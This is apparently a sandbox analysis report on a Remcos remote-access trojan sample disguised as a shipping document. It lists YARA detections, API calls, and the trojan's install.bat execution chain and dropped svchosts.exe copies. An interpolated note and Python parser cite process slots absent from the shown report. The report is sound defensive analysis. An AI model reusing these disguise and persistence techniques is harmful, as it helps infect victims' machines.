Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 25.2.svchosts.exe.2a50a64.1.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 23.2.svchosts.exe.2e90a64.1.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
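The YARA rows above flag the same unpacked Remcos payload in several process slots: the self-injected copy of the sample (17, and memory dump 00000011) and the dropped svchosts.exe copies (22, 23, 25, 31, 33, 36), while the rules disagree on metadata key case (Description vs description). As an added example, not part of the sandbox report, the Python below parses rows of this shape into a rule-to-process map so the hits can be compared against the process tree. The sample rows are constructed to mirror the report's layout (both the run-together "MEMORYMatched rule" form and a separated form), and the assumption that the leading field of a source name is the process index (hex for .sdmp memory dumps, decimal for unpack names) is mine.

```python
import re
from collections import defaultdict

# Constructed rows in the report's "Source: ..., type: ... Matched rule: ..." shape.
# Metadata values are abbreviated; they are not copied from the page.
SAMPLE_LINES = [
    "Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, "
    "type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, "
    "cape_type = Remcos Payload",
    "Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos "
    "hash1 = 7d5efb7e..., author = JPCERT/CC Incident Response Group, "
    "description = detect Remcos in memory, rule_usage = memory scan",
    "Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 "
    "author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload",
    "Source: 22.2.svchosts.exe.2ff0a64.1.raw.unpack, type: UNPACKEDPE; Matched rule: "
    "SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, author = Florian Roth, "
    "description = Detects a variant of a system file name often used by attackers, "
    "reference = https://example.invalid/seedworm",
]

# The type token is upper-case; the non-greedy class stops where "Matched rule:" begins,
# so the glued "MEMORYMatched rule:" and the separated "MEMORY; Matched rule:" both parse.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+?)\s*;?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# Split metadata on ", " only when a "key = " follows, so commas inside
# descriptions (which contain no " = ") stay in the value.
META_SPLIT = re.compile(r",\s+(?=\w+\s*=\s)")


def parse_meta(text: str) -> dict:
    """Turn 'k1 = v1, k2 = v2' into a dict; keys are lower-cased to merge Description/description."""
    meta = {}
    for part in META_SPLIT.split(text):
        key, sep, value = part.partition(" = ")
        if sep:
            meta[key.strip().lower()] = value.strip()
    return meta


def process_index(source: str):
    """Assumption: the first dotted field names the process slot, hex for .sdmp dumps."""
    head = source.split(".", 1)[0]
    if source.endswith(".sdmp"):
        return int(head, 16)
    return int(head) if head.isdigit() else None


def parse_match_line(line: str):
    """Return a dict for one YARA-match row, or None if the row has another shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "source": m.group("source"),
        "type": m.group("type"),
        "process": process_index(m.group("source")),
        "rule": m.group("rule"),
        "meta": parse_meta(m.group("meta")),
    }


def summarize(lines) -> dict:
    """Map each rule name to the sorted list of process slots it fired in."""
    hits = defaultdict(set)
    for line in lines:
        row = parse_match_line(line)
        if row and row["process"] is not None:
            hits[row["rule"]].add(row["process"])
    return {rule: sorted(procs) for rule, procs in hits.items()}


if __name__ == "__main__":
    for rule, procs in summarize(SAMPLE_LINES).items():
        print(f"{rule}: processes {procs}")
```

A rule that fires in the dropped svchosts.exe slots but not in slot 0 (the .NET loader before injection) is the quickest confirmation that the payload only exists unpacked in memory, which is why the static scanners in the report disagree on the file while the memory rules agree.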
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchosts.exe.17.dr; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@21/6@0/2
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError 17_2_0040CA41
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 17_2_004081B7
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource 17_2_00408150
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV OLYMPIC PROGRESS VSL PARTICULARS.exe.log
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Mutant created: \Sessions\1\BaseNamedObjects\ZYbcPNZuhmAjcdlhlXvjXjwC
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Mutant created: \Sessions\1\BaseNamedObjects\remcos_lfqwkauxufogluh
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; File created: C:\Users\user\AppData\Local\Temp\install.bat
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Virustotal: Detection: 71%
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Metadefender: Detection: 34%
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; File read: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe
Source: unknown; Process created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe 'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe'
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Process created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
Source: unknown; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
Source: unknown; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Process created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress 17_2_00407D38
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 0_2_003524D8 push edx; iretd 0_2_003524E7
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 0_2_02630A3B push cs; retf 0_2_02630A3C
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 0_2_02631383 pushfd ; ret 0_2_02631385
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 0_2_02633CDA push esp; retf 0_2_02633CE1
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_0040FCF0 push eax; ret 17_2_0040FD1E
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_00F924D8 push edx; iretd 17_2_00F924E7
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 22_2_00C124D8 push edx; iretd 22_2_00C124E7
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 22_2_04FD1383 pushfd ; ret 22_2_04FD1385
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 22_2_04FD6E95 push FFFFFF8Bh; iretd 22_2_04FD6E97
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 22_2_04FD0A3B push cs; retf 22_2_04FD0A3C
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 23_2_007924D8 push edx; iretd 23_2_007924E7
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 23_2_01111383 pushfd ; ret 23_2_01111385
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 23_2_01110A3B push cs; retf 23_2_01110A3C
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 23_2_01113CDA push esp; retf 23_2_01113CE1
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 25_2_005F24D8 push edx; iretd 25_2_005F24E7
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 25_2_02951383 pushfd ; ret 25_2_02951385
Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe; Code function: 25_2_02950A3B push cs; retf 25_2_02950A3C
Source: initial sample; Static PE information: section name: .text entropy: 7.76293714446
Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe; Code function: 17_2_0040A71E 